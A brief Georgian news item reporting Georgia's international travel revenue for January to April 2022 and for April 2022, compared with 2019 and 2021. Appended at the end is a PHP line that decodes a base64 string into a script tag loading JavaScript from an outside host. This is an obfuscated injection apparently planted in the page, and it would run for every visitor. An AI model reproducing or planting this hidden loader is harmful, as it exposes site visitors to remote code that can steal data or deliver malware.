celsiusi
ავერსი საქკაბელი
ტურიზმის ეროვნული ადმინისტრაცია 2022 წლის იანვრი-აპრილის თვის შემოსავლების სტატისტიკას აქვეყნებს.
 
როგორც მონაცემებში აღნიშნული, ოთხ თვეში საერთაშორისო მოგზაურობიდან საქართველომ 582 მილიონი დოლარის შემოსავალი მიიღო, რაც 2019 წლის მაჩვენებლის 68.9 პროცენტით აღდგენაა. 2021 წლის იანვრ-აპრილის თვესთან შედარებით, მოგზაურობიდან შემოსავლები გაზრდილია 478,886,422 (+463.1%) აშშ დოლარით.
 
რაც შეეხება 2022 წლის აპრილის თვეს, ერთ თვეში მოგზაურობიდან მიღებულმა შემოსავალმა 188,588,938 აშშ დოლარი შეადგინა, რაც 2019 წლის მაჩვენებლის 70.6 პროცენტით აღდგენაა. 2021 წლის აპრილის თვესთან შედარებით, მოგზაურობიდან შემოსავლები გაზრდილია 138,729,246 (+278.2%) აშშ დოლარით.
712
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");